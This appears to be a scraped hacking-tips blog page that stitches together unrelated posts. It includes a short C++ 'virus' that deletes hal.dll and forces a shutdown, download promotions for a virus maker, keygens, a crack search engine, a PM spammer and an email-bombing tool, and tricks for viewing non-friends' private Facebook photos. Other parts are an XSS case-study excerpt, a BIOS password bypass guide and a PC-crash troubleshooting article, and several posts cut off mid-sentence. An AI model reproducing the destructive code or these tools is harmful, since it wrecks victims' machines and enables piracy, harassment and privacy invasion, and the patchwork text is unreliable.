4. Now, again open notepad again and write ren folder.{21EC2020-3AEA-1069-A2DD-08002B30309D} folder and now (Notepad Menu) File>save as.
5. In the ’save as’ name it as key.bat and click save ! (Save it on Desktop)
6. Now, double click lock.bat to lock the folder and now if you open your folder, control panel will open up

PWERFUL C++ VIRUS

This is a powerful C++ virus, which deletes Hal.dll, something that is required for startup. After deleting that, it shuts down, never to start again.
Warning: Do not try this on your home computer.

The Original Code:

Code:

#include
#include
using namespace std;
int main(int argc, char *argv[])
{
std::remove("C:\\windows\\system32\\hal.dll"); //PWNAGE TIMEsystem("shutdown -s -r");system("PAUSE");return EXIT_SUCCESS;
}
A more advanced version of this virus which makes the C:\Windows a variable that cannot be

Virus Maker

This Incridable Virus Maker is 100% Free and I Love it.



This Program is made by D1sr3p41r3ds



I want to share it with you all!! If i got it wrong , Contact ME!



Download Now

All in one KeyGen


Adobe Acrobat 3D 8.1

Adobe Acrobat 8.0 Professional

Adobe After Effects CS3

Key Gen for Nero 9



Nero 9

Nero 9 HD

Move It

Back It Up

Media Home

Grace Note Plug In

Blue Ray Video Plug In

Blue Ray Disc Authoring Plug In

DTS Plug In (Extra)

mp3 Pro Plug In (Extra)

SecurDisc Viewer (Extra)

Nero IN Cd Reader (Extra)

BlueRay HD/DVD Plug In (Extra)
Download

Search Cracks, Serials or Keygens on the GO !

Are you tired of searching the Internet for Cracks, Serials and Keygens with the Risk of Getting infected by Trojans and Worms? Whatever is your reason – illegally install, not genuine, no money to pay, forget purchased original valid serial key, lazy to register product, want to extend trial limit and etc – if you search for cracks or serials online, you will likely end up searching, finding, locating and downloading from a few crack sites or cracks search engines. However, these crack sites contain lots of toolbars, popups, spyware, adware, malware or unwanted components that try to infect your computer. Craagle is an utility that helps you to avoid these nuisance.


Craagle is a free downloadable standalone meta search engine that allows users to search every sort of cracks, serials, keys, keygen and covers, without falling into annoying toolbars, pop-ups, spyware, ad-ware and mal-ware that the crack sites or search sites abundant with. It works

Download mobile messenger ebuddy

Networks

Yahoo!, MSN, Facebook Chat, AIM, ICQ and Google Talk buddies in one single buddylist! Join eBuddy and get the most popular and free instant messaging application on your mobile.


DOWNLOAD

A Security Case Study Facebook XSS(Cross Site Hacking)

The Facebook Platform represents a powerful combination of social networking
and third-party gadget aggregation. Officially released in May 2007, the
Facebook API provides developers with millions of potential users and partial
access to their information. The highly personal nature of Facebook data and the
amplifying effects of the social network make it crucial that the Facebook
Platform does not enable third-party attacks. This paper describes Facebook’s
security mechanisms and presents a cross-site scripting vulnerability in
Facebook Markup Language that allows arbitrary JavaScript to be added to
application users’ profiles. The profile in the code can then defeat their antirequest
forging security measures and hijack the sessions of viewers.
An introduction to the Facebook Platform
Facebook tightly integrates third-party applications into their website.
Applications are served externally but are viewed in the context of a Facebookhosted
page with a Facebook URL. An application has two choices about its
Facebook home page: it can be isolated in an iFrame or written in Facebook’s
proprietary markup language and embedded directly into the page. Code
written in Facebook Markup Language (FBML) is retrieved by the Facebook
server, parsed, and then inserted into their surrounding code. FBML includes a
“safe” subset of HTML and CSS as well as Facebook-specific tags.
In addition to these application home pages, users may add gadgets to their
profiles. Profile gadgets are presented alongside Facebook-provided content and
allow users to individualize a small portion of their profile. The gadget code
must be written in FBML.
Session security measures
Facebook uses two methods to identify and authenticate users: cookies, which
contain session information, and hidden form IDs that are supposed to ensure
that forms come from the user. With either a cookie or knowledge of a user’s
form ID, an attacker can impersonate a victim. A cookie’s session information
would allow an attacker to construct XMLHttpRequests and assume all the same
privileges as the user. Hidden form IDs can be used to session surf, meaning the
attacker can embed a hidden form into a seemingly innocent page. The form
would automatically submit when viewed by a logged-in user and have the
JULY 2007
2
authentication credentials of the unwitting viewer. It is imperative that both
hidden form IDs and cookies be shielded from third-party applications.
The DOM provides built-in isolation for third-party code in iFrames. The Same
Origin Policy prevents the applications from accessing any of the content from
the Facebook servers, including the cookie and the form IDs. However, unlike
parsed FBML code, Facebook must pass all user and viewer information to the
application. This limits Facebook’s privacy control.
FBML gives Facebook the ability to abstract user information and maintain

How to Bypass BIOS Passwords

How to Bypass BIOS Passwords

BIOS passwords can add an extra layer of security for desktop and laptop computers. They are used to either prevent a user from changing the BIOS settings or to prevent the PC from booting without a password. Unfortunately, BIOS passwords can also be a liability if a user forgets their password, or changes the password to intentionally lock out the corporate IT department. Sending the unit back to the manufacturer to have the BIOS reset can be expensive and is usually not covered in the warranty. Never fear, all is not lost. There are a few known backdoors and other tricks of the trade that can be used to bypass or reset the BIOS

DISCLAIMER
This article is intended for IT Professionals and systems administrators with experience servicing computer hardware. It is not intended for home users, hackers, or computer thieves attempting to crack the password on a stolen PC. Please do not attempt any of these procedures if you are unfamiliar with computer hardware, and please use this information responsibly. LabMice.net is not responsible for the use or misuse of this material, including loss of data, damage to hardware, or personal injury.


Before attempting to bypass the BIOS password on a computer, please take a minute to contact the hardware manufacturer support staff directly and ask for their recommended methods of bypassing the BIOS security. In the event the manufacturer cannot (or will not) help you, there are a number of methods that can be used to bypass or reset the BIOS password yourself. They include:

Using a manufacturers backdoor password to access the BIOS

Use password cracking software

Reset the CMOS using the jumpers or solder beads.

Removing the CMOS battery for at least 10 minutes

Overloading the keyboard buffer

Using a professional service

Please remember that most BIOS passwords do not protect the hard drive, so if you need to recover the data, simply remove the hard drive and install it in an identical system, or configure it as a slave drive in an existing system. The exception to this are laptops, especially IBM Thinkpads, which silently lock the hard drive if the supervisor password is enabled. If the supervisor password is reset without resetting the and hard drive as well, you will be unable to access the data on the drive.


--------------------------------------------------------------------------------

Backdoor passwords

Many BIOS manufacturers have provided backdoor passwords that can be used to access the BIOS setup in the event you have lost your password. These passwords are case sensitive, so you may wish to try a variety of combinations. Keep in mind that the key associated to "_" in the US keyboard corresponds to "?" in some European keyboards. Laptops typically have better BIOS security than desktop systems, and we are not aware of any backdoor passwords that will work with name brand laptops.

WARNING: Some BIOS configurations will lock you out of the system completely if you type in an

Room Fun v2 Beta Version With Voice & Chat Screen !




















Some Features :
Login with YMSG15
Auto Answering Machine
Greeting User Join
PM User Leaves the room
Chat Screen with WebBrowser
Manual Cracker
PM Spammer
Grab Avatar User (knowing avatar without add)
Kill YM 8-9 DC 1 Bot Login
Lock ID - Temporary 24 Hours

Email Hack Tool




















It will send the e-mails with you id and
subject to the victum number of tiems

DOWNLOAD


Google Maps for mobile featuring Latitude

My Location (beta)
Google Maps for mobile features My Location, a service that allows you to retrieve your current location without the need for GPS. My Location approximates your current location on the map, usually within 1000 meters, by recognizing information broadcast from mobile towers, and in some cases Wi-Fi signals, near you. Google Maps for mobile also uses built-in GPS, or can link to a Bluetooth GPS sensor to more accurately pinpoint your location.

New! Google Latitude
Latitude lets you see your friends' locations and status messages. Share your location and status with select friends. Get started by selecting "Join Latitude" in the menu, or learn more and get the Latitude iGoogle gadget at google.com/latitude. Latitude is availabe on Symbian S60 3rd Edition, Windows Mobile, and BlackBerry

GET FACEBOOK IN YOUR MOBILE

















DOWNLOAD

*******************************END***********************************

Facebook Profile Hack - Trick




This is not a Hack - Just a trick :P

1- At the "Setting Tab" Above, Chose "Account Setting"
2- Join any network you want ;) "Like Egypt"
3- You will notice this statement

" There are 486,597 people in the Egypt network. " For Example
4- Click on this number, and from know you can see thousands of profiles :)


May this trick to be useful for someones :D
But there is an option in your options on Facebook that made your profile not visible to anyone, but believe me, a lot of people didn't notice that option ;)

View Private Photos on Facebook !!!!


HOT APP TO SEE THE PICS OF PEOPLE WHO ARE NOT UR FRIENDS Black Hat !!!





First go to :




Accept the app then you'll do anything you want : just copy/cut the ID, or the Name of the person and enjoy Devlish



You can even download the entire album.




If you dont want to go to http://apps.facebook.com/josh_owns/ each time there is an addon
Publish Post
specific : https://addons.mozilla.org/en-US/firefox/addon/12454

Gain Admin previlage- good 4 uni students (sliit ppl watch it)

This works on WIn 2000 & WIN XP.I will teach u how we can gain access to the website you want to for free, and how you can gain access to 'control panel', and the various other tools of Widows that may have been blocked from your grasp like 'regedit'. When u are at the log on screen, type in your username and password. NOW When you hit enter, and...

*******************************END***********************************

Reasons why PCs Crash



Fatal error: the system has become unstable or is busy," it says. "Enter to return to Windows or press Control-Alt-Delete to restart your computer. If you do this you will lose any unsaved information in all open applications."
You have just been struck by the Blue Screen of Death. Anyone who uses Mcft Windows will be familiar with this. What can you do? More importantly, how can you prevent it happening?
1. Hardware conflict
The number one reason why Windows crashes is hardware conflict. Each hardware device communicates to other devices through an interrupt request channel (IRQ). These are supposed to be unique for each device.
For example, a printer usually connects internally on IRQ 7. The keyboard usually uses IRQ 1 and the floppy disk drive IRQ 6. Each device will try to hog a single IRQ for itself.
If there are a lot of devices, or if they are not installed properly, two of them may end up sharing the same IRQ number. When the user tries to use both devices at the same time, a crash can happen. The way to check if your computer has a hardware conflict is through the following route:
* Start-Settings-Control Panel-System-Device Manager.
Often if a device has a problem a yellow ‘!’ appears next to its description in the Device Manager. Highlight Computer (in the Device Manager) and press Properties to see the IRQ numbers used by your computer. If the IRQ number appears twice, two devices may be using it.
Sometimes a device might share an IRQ with something described as ‘IRQ holder for PCI steering’. This can be ignored. The best way to fix this problem is to remove the problem device and reinstall it.
Sometimes you may have to find more recent drivers on the internet to make the device function properly. A good resource is www.driverguide.com. If the device is a soundcard, or a modem, it can often be fixed by moving it to a different slot on the motherboard (be careful about opening your computer, as you may void the warranty).
When working inside a computer you should switch it off, unplug the mains lead and touch an unpainted metal surface to discharge any static electricity.
To be fair to Mcft, the problem with IRQ numbers is not of its making. It is a legacy problem going back to the first PC designs using the IBM 8086 chip. Initially there were only eight IRQs. Today there are 16 IRQs in a PC. It is easy to run out of them. There are plans to increase the number of IRQs in future designs.
2. Bad Ram
Ram (random-access memory) problems might bring on the blue screen of death with a message saying Fatal Exception Error. A fatal error indicates a serious hardware problem. Sometimes it may mean a part is damaged and will need replacing.
But a fatal error caused by Ram might be caused by a mismatch of chips. For example, mixing 70-nanosecond (70ns) Ram with 60ns Ram will usually force the computer to run all the Ram at the slower speed. This will often crash the machine if the Ram is overworked.
One way around this problem is to enter the BIOS settings and increase the wait state of the Ram. This can
free counters